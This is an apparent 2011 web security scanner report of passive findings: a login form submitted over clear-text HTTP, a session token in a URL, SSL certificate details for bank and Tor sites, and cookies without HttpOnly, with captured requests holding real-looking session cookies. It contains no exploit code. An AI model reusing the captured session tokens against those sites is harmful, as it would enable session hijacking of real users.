Path:   /adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/hypersensitivity-to-noise-touch-smell/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/hypersensitivity-to-noise-touch-smell/?ap=825 HTTP/1.1
Host: www.healthcentral.com
Proxy-Connection: keep-alive
Referer: http://paid.outbrain.com/network/redir?key=ea083f1f0a8664e17286dd018ebbd632&rdid=218341001&type=CAD_def_prd&in-site=false&pc_id=3389484&req_id=21fd5e9603ad3d38cc44a355febaf417&agent=blog_JS_rec&recMode=4&reqType=1&wid=1&imgType=0&version=40317&idx=6
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2712441205010785-60000115803F0F69[CE]

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.1.6
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Tue, 19 Jul 2011 01:59:05 GMT
Date: Tue, 19 Jul 2011 01:59:05 GMT
Content-Length: 36632
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html>
<head>

<title>Common Symptoms of ADD & ADHD in Women - ADHD</title>
<META http-equiv="Con
...[SNIP]...
</div>
<form onsubmit="new Ajax.Request('/adhd/c/login', {asynchronous:true, evalScripts:true, method:'post', parameters:Form.serialize(this)}); return false;" method="post" action="#">
<div class="text">
...[SNIP]...
</label><input type="password" tabindex="101" size="30" name="user[password]" id="mini_home_user_password">
</div>
...[SNIP]...

6. Session token in URL  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.bing.com
Path:   /shopping/content/cssxc.vcss

Issue detail

The URL in the request appears to contain a session token within the query string:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.

Request

GET /shopping/content/cssxc.vcss;jsessionid=4824AC5545E487AD64CBB4EB8A85C405?p=site.css&v=1.1.6.1-1287006327354 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.bing.com
Cookie: _SS=SID=517EAE73CC104DC19B783FE3EFAFB453; OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&flt8=0&flt9=0&flt10=0&flt11=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; SRCHD=MS=1865530&SM=1&D=1865529; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110719; MUID=39AE9E99C74F6BF03BB69CADC34F6B13; _FS=mkt=en-US; SRCHUID=V=2&GUID=BED17522183A437CB7743610E65B8CD1

Response

HTTP/1.1 200 OK
Content-Type: text/css
Last-Modified: Tue, 01 Jan 2009 00:00:00 GMT
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Vary: Accept-Encoding
Content-Length: 20173
Cache-Control: public, max-age=315360000
Expires: Fri, 16 Jul 2021 12:10:22 GMT
Date: Tue, 19 Jul 2011 12:10:22 GMT
Connection: close


/* File: /site.css */

body,div,dl,dt,dd,ul,ol,li,pre,form,fieldset,input,textarea,p,blockquote,th,td{margin:0;padding:0;}table{border-collapse:collapse;border-spacing:0;}fieldset,img{border:0;}addre
...[SNIP]...

7. SSL certificate  previous  next
There are 16 instances of this issue:

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.



7.1. https://adfarm.mediaplex.com/  previous  next

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://adfarm.mediaplex.com
Path:   /

Issue detail

The following problems were identified with the server's SSL certificate:The server presented the following certificate:

Issued to:  mojofarm.mediaplex.com
Issued by:  VeriSign Class 3 Secure Server CA - G2
Valid from:  Wed Sep 30 19:00:00 CDT 2009
Valid to:  Sat Nov 10 17:59:59 CST 2012

7.2. https://www.torservers.net/  previous  next

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://www.torservers.net
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:The server presented the following certificates:

Server certificate

Issued to:  www.torservers.net
Issued by:  StartCom Class 1 Primary Intermediate Server CA
Valid from:  Thu Feb 17 06:25:00 CST 2011
Valid to:  Fri Feb 17 20:51:13 CST 2012

Certificate chain #1

Issued to:  StartCom Class 1 Primary Intermediate Server CA
Issued by:  StartCom Certification Authority
Valid from:  Wed Oct 24 15:54:17 CDT 2007
Valid to:  Tue Oct 24 15:54:17 CDT 2017

Certificate chain #2

Issued to:  StartCom Certification Authority
Issued by:  StartCom Certification Authority
Valid from:  Sun Sep 17 14:46:36 CDT 2006
Valid to:  Wed Sep 17 14:46:36 CDT 2036

7.3. https://www.wellsfargoadvisors.com/  previous  next

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://www.wellsfargoadvisors.com
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:The server presented the following certificates:

Server certificate

Issued to:  home.wellsfargoadvisors.com
Issued by:  Wells Fargo Certificate Authority 01
Valid from:  Tue Nov 02 10:13:36 CDT 2010
Valid to:  Fri Nov 02 10:13:36 CDT 2012

Certificate chain #1

Issued to:  Wells Fargo Certificate Authority 01
Issued by:  GTE CyberTrust Global Root
Valid from:  Wed Oct 25 05:51:54 CDT 2006
Valid to:  Fri Oct 25 05:51:03 CDT 2013

Certificate chain #2

Issued to:  GTE CyberTrust Global Root
Issued by:  GTE CyberTrust Global Root
Valid from:  Wed Aug 12 19:29:00 CDT 1998
Valid to:  Mon Aug 13 18:59:00 CDT 2018

Certificate chain #3

Issued to:  GTE CyberTrust Global Root
Issued by:  GTE CyberTrust Global Root
Valid from:  Wed Aug 12 19:29:00 CDT 1998
Valid to:  Mon Aug 13 18:59:00 CDT 2018

7.4. https://blog.torproject.org/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://blog.torproject.org
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  blog.torproject.org
Issued by:  RapidSSL CA
Valid from:  Mon Mar 07 08:34:49 CST 2011
Valid to:  Sat Mar 09 09:24:48 CST 2013

Certificate chain #1

Issued to:  RapidSSL CA
Issued by:  GeoTrust Global CA
Valid from:  Fri Feb 19 16:45:05 CST 2010
Valid to:  Tue Feb 18 16:45:05 CST 2020

Certificate chain #2

Issued to:  GeoTrust Global CA
Issued by:  GeoTrust Global CA
Valid from:  Mon May 20 23:00:00 CDT 2002
Valid to:  Fri May 20 23:00:00 CDT 2022

7.5. https://online.educaid.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://online.educaid.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  online.educaid.com
Issued by:  www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Valid from:  Wed Dec 08 18:00:00 CST 2010
Valid to:  Fri Dec 09 17:59:59 CST 2011

Certificate chain #1

Issued to:  www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Wed Apr 16 19:00:00 CDT 1997
Valid to:  Mon Oct 24 18:59:59 CDT 2011

Certificate chain #2

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Tue Aug 01 18:59:59 CDT 2028

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028

7.6. https://online.wellsfargo.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://online.wellsfargo.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  online.wellsfargo.com
Issued by:  www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Valid from:  Sun Jan 30 18:00:00 CST 2011
Valid to:  Tue Jan 31 17:59:59 CST 2012

Certificate chain #1

Issued to:  www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Wed Apr 16 19:00:00 CDT 1997
Valid to:  Mon Oct 24 18:59:59 CDT 2016

Certificate chain #2

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028

7.7. https://onlineservices.wachovia.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://onlineservices.wachovia.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  onlineservices.wachovia.com
Issued by:  Wells Fargo Certificate Authority 01
Valid from:  Fri Nov 05 12:53:19 CDT 2010
Valid to:  Mon Nov 05 11:53:19 CST 2012

Certificate chain #1

Issued to:  Wells Fargo Certificate Authority 01
Issued by:  GTE CyberTrust Global Root
Valid from:  Wed Oct 25 05:51:54 CDT 2006
Valid to:  Fri Oct 25 05:51:03 CDT 2013

Certificate chain #2

Issued to:  GTE CyberTrust Global Root
Issued by:  GTE CyberTrust Global Root
Valid from:  Wed Aug 12 19:29:00 CDT 1998
Valid to:  Mon Aug 13 18:59:00 CDT 2018

Certificate chain #3

Issued to:  GTE CyberTrust Global Root
Issued by:  GTE CyberTrust Global Root
Valid from:  Wed Aug 12 19:29:00 CDT 1998
Valid to:  Mon Aug 13 18:59:00 CDT 2018

7.8. https://secure.codero.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.codero.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.codero.com
Issued by:  COMODO High-Assurance Secure Server CA
Valid from:  Wed Jun 23 19:00:00 CDT 2010
Valid to:  Sat Jun 23 18:59:59 CDT 2012

Certificate chain #1

Issued to:  COMODO High-Assurance Secure Server CA
Issued by:  AddTrust External CA Root
Valid from:  Thu Apr 15 19:00:00 CDT 2010
Valid to:  Sat May 30 05:48:38 CDT 2020

Certificate chain #2

Issued to:  AddTrust External CA Root
Issued by:  AddTrust External CA Root
Valid from:  Tue May 30 05:48:38 CDT 2000
Valid to:  Sat May 30 05:48:38 CDT 2020

7.9. https://secure.internode.on.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.internode.on.net
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  secure.internode.on.net
Issued by:  GeoTrust DV SSL CA
Valid from:  Tue Feb 08 19:12:23 CST 2011
Valid to:  Tue Mar 12 19:56:20 CDT 2013

Certificate chain #1

Issued to:  GeoTrust DV SSL CA
Issued by:  GeoTrust Global CA
Valid from:  Fri Feb 26 15:32:31 CST 2010
Valid to:  Tue Feb 25 15:32:31 CST 2020

Certificate chain #2

Issued to:  GeoTrust Global CA
Issued by:  GeoTrust Global CA
Valid from:  Mon May 20 23:00:00 CDT 2002
Valid to:  Fri May 20 23:00:00 CDT 2022

7.10. https://secure2.internode.on.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure2.internode.on.net
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  secure2.internode.on.net
Issued by:  GeoTrust DV SSL CA
Valid from:  Thu May 26 07:30:31 CDT 2011
Valid to:  Tue Jun 26 19:34:05 CDT 2012

Certificate chain #1

Issued to:  GeoTrust DV SSL CA
Issued by:  GeoTrust Global CA
Valid from:  Fri Feb 26 15:32:31 CST 2010
Valid to:  Tue Feb 25 15:32:31 CST 2020

Certificate chain #2

Issued to:  GeoTrust Global CA
Issued by:  GeoTrust Global CA
Valid from:  Mon May 20 23:00:00 CDT 2002
Valid to:  Fri May 20 23:00:00 CDT 2022

7.11. https://wellsfargo.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://wellsfargo.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  wellsfargo.com
Issued by:  www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Valid from:  Tue Apr 19 19:00:00 CDT 2011
Valid to:  Thu Apr 19 18:59:59 CDT 2012

Certificate chain #1

Issued to:  www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Wed Apr 16 19:00:00 CDT 1997
Valid to:  Mon Oct 24 18:59:59 CDT 2016

Certificate chain #2

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028

7.12. https://wellsoffice.wellsfargo.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://wellsoffice.wellsfargo.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  wellsoffice.wellsfargo.com
Issued by:  Wells Fargo Certificate Authority 01
Valid from:  Mon Sep 20 22:41:54 CDT 2010
Valid to:  Thu Sep 20 22:41:54 CDT 2012

Certificate chain #1

Issued to:  Wells Fargo Certificate Authority 01
Issued by:  GTE CyberTrust Global Root
Valid from:  Wed Oct 25 05:51:54 CDT 2006
Valid to:  Fri Oct 25 05:51:03 CDT 2013

Certificate chain #2

Issued to:  GTE CyberTrust Global Root
Issued by:  GTE CyberTrust Global Root
Valid from:  Wed Aug 12 19:29:00 CDT 1998
Valid to:  Mon Aug 13 18:59:00 CDT 2018

Certificate chain #3

Issued to:  GTE CyberTrust Global Root
Issued by:  GTE CyberTrust Global Root
Valid from:  Wed Aug 12 19:29:00 CDT 1998
Valid to:  Mon Aug 13 18:59:00 CDT 2018

7.13. https://wfefs.wellsfargo.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://wfefs.wellsfargo.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  wfefs.wellsfargo.com
Issued by:  Wells Fargo Certificate Authority 01
Valid from:  Tue Mar 09 10:58:00 CST 2010
Valid to:  Fri Mar 09 10:58:00 CST 2012

Certificate chain #1

Issued to:  Wells Fargo Certificate Authority 01
Issued by:  GTE CyberTrust Global Root
Valid from:  Wed Oct 25 05:51:54 CDT 2006
Valid to:  Fri Oct 25 05:51:03 CDT 2013

Certificate chain #2

Issued to:  GTE CyberTrust Global Root
Issued by:  GTE CyberTrust Global Root
Valid from:  Wed Aug 12 19:29:00 CDT 1998
Valid to:  Mon Aug 13 18:59:00 CDT 2018

Certificate chain #3

Issued to:  GTE CyberTrust Global Root
Issued by:  GTE CyberTrust Global Root
Valid from:  Wed Aug 12 19:29:00 CDT 1998
Valid to:  Mon Aug 13 18:59:00 CDT 2018

7.14. https://www.torproject.org/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.torproject.org
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.torproject.org
Issued by:  DigiCert High Assurance CA-3
Valid from:  Mon Feb 14 18:00:00 CST 2011
Valid to:  Fri Apr 19 18:59:59 CDT 2013

Certificate chain #1

Issued to:  DigiCert High Assurance CA-3
Issued by:  DigiCert High Assurance EV Root CA
Valid from:  Mon Apr 02 19:00:00 CDT 2007
Valid to:  Sat Apr 02 19:00:00 CDT 2022

Certificate chain #2

Issued to:  DigiCert High Assurance EV Root CA
Issued by:  DigiCert High Assurance EV Root CA
Valid from:  Thu Nov 09 18:00:00 CST 2006
Valid to:  Sun Nov 09 18:00:00 CST 2031

7.15. https://www.wachovia.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wachovia.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.wachovia.com
Issued by:  Wells Fargo Certificate Authority 01
Valid from:  Thu Aug 12 15:54:43 CDT 2010
Valid to:  Sun Aug 12 15:54:43 CDT 2012

Certificate chain #1

Issued to:  Wells Fargo Certificate Authority 01
Issued by:  GTE CyberTrust Global Root
Valid from:  Wed Oct 25 05:51:54 CDT 2006
Valid to:  Fri Oct 25 05:51:03 CDT 2013

Certificate chain #2

Issued to:  GTE CyberTrust Global Root
Issued by:  GTE CyberTrust Global Root
Valid from:  Wed Aug 12 19:29:00 CDT 1998
Valid to:  Mon Aug 13 18:59:00 CDT 2018

Certificate chain #3

Issued to:  GTE CyberTrust Global Root
Issued by:  GTE CyberTrust Global Root
Valid from:  Wed Aug 12 19:29:00 CDT 1998
Valid to:  Mon Aug 13 18:59:00 CDT 2018

7.16. https://www.wellsfargo.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.wellsfargo.com
Issued by:  www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Valid from:  Tue Apr 19 19:00:00 CDT 2011
Valid to:  Thu Apr 19 18:59:59 CDT 2012

Certificate chain #1

Issued to:  www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Wed Apr 16 19:00:00 CDT 1997
Valid to:  Mon Oct 24 18:59:59 CDT 2016

Certificate chain #2

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028

8. Cookie without HttpOnly flag set  previous  next
There are 40 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



8.1. https://www.wellsfargo.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.wellsfargo.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.wellsfargo.com
Connection: keep-alive
Referer: https://www.wellsfargo.com/com/shareowner_services/services_for_shareholders/investment_plan/hmnfinancial
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=403C6448D3FA27DB; JSESSIONID=248DE7CA98FB9058FEC7E28C47105F92; wfacookie=B-20110719024057407636411; OB_SO_ORIGIN=source%3Dhomepage; WFHOME=PER; wcmcookiesrh=n8cLTlRYjNyY5JJqwHkVryJ5zCn2Zd0wy2JnfSBfWQRhp8dP86sl!2080519142; ISD_WCM_COOKIE=1380064266.16927.0000; wcmcookiewf=MlB2TlRHtlpNMhhlQQWLnngW4x5GhPs9TMCyCTHbRHNBQ1M202g6!2080519142; TCID=0007b089-750d-8c50-be96-e99900000049; NSC_XfmmtGbshp4=445b32067863

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Tue, 19 Jul 2011 09:42:23 GMT
Content-type: text/html;charset=UTF-8
Cache-control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-cookie: JSESSIONID=9944F37427F34CDD89C538E6A7736719;Path=/;Secure
Content-Length: 21137


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">


<head
...[SNIP]...

8.2. http://b.scorecardresearch.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=2&c2=6035874&rn=735981431&c7=http%3A%2F%2Fwww.healthcentral.com%2Fadhd%2Fcf%2Fslideshows%2Fcommon-symptoms-of-add-and-adhd-in-women%2Fhypersensitivity-to-noise-touch-smell%2F%3Fap%3D825&c8=Common%20Symptoms%20of%20ADD%20%26%20ADHD%20in%20Women%20-%20ADH&c9=http%3A%2F%2Fpaid.outbrain.com%2Fnetwork%2Fredir%3Fkey%3Dea083f1f0a8664e17286dd018ebbd632%26rdid%3D218341001%26type%3DCAD_def_prd%26in-site%3Dfalse%26pc_id%3D3389484%26req_id%3D21fd5e9603ad3d38cc44a355febaf417%26agent%3Dblog_JS_rec%26recMode%3D4%26reqType%3D1%26wid%3D1%26imgType%3D0%26version%3D40317%26idx%3D6&cv=2.2&cs=js HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.healthcentral.com/adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/hypersensitivity-to-noise-touch-smell/?ap=825
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=64dfc632-184.84.247.65-1305305561

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Tue, 19 Jul 2011 01:58:26 GMT
Connection: close
Set-Cookie: UID=64dfc632-184.84.247.65-1305305561; expires=Thu, 18-Jul-2013 01:58:26 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


8.3. http://bing.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bing.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: bing.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110601; SRCHD=SM=1&MS=1842502&D=1841741&AF=MSN005; MUID=3957719BE8F34A5DA51D204E7E06704A; ANON=A=09C89511BF100DC2E6BE1C66FFFFFFFF&E=b48&W=1; NAP=V=1.9&E=aee&C=1y2a1t4TVNCPNy9y9DmWgYg0jNzUVxeHBpRB9YpCzs7AkrhVIlPNyg&W=1; _FP=; _RwBf=credit=-1&s=0; _UR=OMW=1; _SS=SID=6972CFBED6CD45B1A2140850C807FA64

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: no-cache
Content-Length: 0
Location: http://www.bing.com/
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Edge-control: no-store
Set-Cookie: _HOP=I=1&TS=1311077323; domain=bing.com; path=/
Date: Tue, 19 Jul 2011 12:08:42 GMT


8.4. http://c.atdmt.com/c.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c.atdmt.com
Path:   /c.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /c.gif?DI=15074&RedC=c.bing.com&MXFR=1A2694B1632F60E708B59685672F60DA HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: c.atdmt.com

Response

HTTP/1.1 302 Redirect
Cache-Control: private, no-cache, proxy-revalidate, no-store
Pragma: no-cache
Location: http://c.bing.com/c.gif?DI=15074&MUID=39AE9E99C74F6BF03BB69CADC34F6B13&cb=1cc460cb9062000
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Set-Cookie: MUID=39AE9E99C74F6BF03BB69CADC34F6B13; domain=.atdmt.com; expires=Sat, 04-Feb-2012 12:09:34 GMT; path=/;
Date: Tue, 19 Jul 2011 12:09:34 GMT
Content-Length: 0


8.5. http://c.bing.com/c.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c.bing.com
Path:   /c.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /c.gif?DI=15074 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: c.bing.com
Cookie: _SS=SID=517EAE73CC104DC19B783FE3EFAFB453; OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&flt8=0&flt9=0&flt10=0&flt11=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; SRCHD=MS=1865529; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110719

Response

HTTP/1.1 302 Redirect
Cache-Control: private, no-cache, proxy-revalidate, no-store
Pragma: no-cache
Location: http://c.atdmt.com/c.gif?DI=15074&RedC=c.bing.com&MXFR=20C55B5B3C8E668525A1596F388E6676
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Set-Cookie: MUID=20C55B5B3C8E668525A1596F388E6676&TUID=1; domain=.bing.com; expires=Sat, 04-Feb-2012 12:09:33 GMT; path=/;
Date: Tue, 19 Jul 2011 12:09:32 GMT
Content-Length: 0


8.6. http://odb.outbrain.com/utils/get  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://odb.outbrain.com
Path:   /utils/get

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

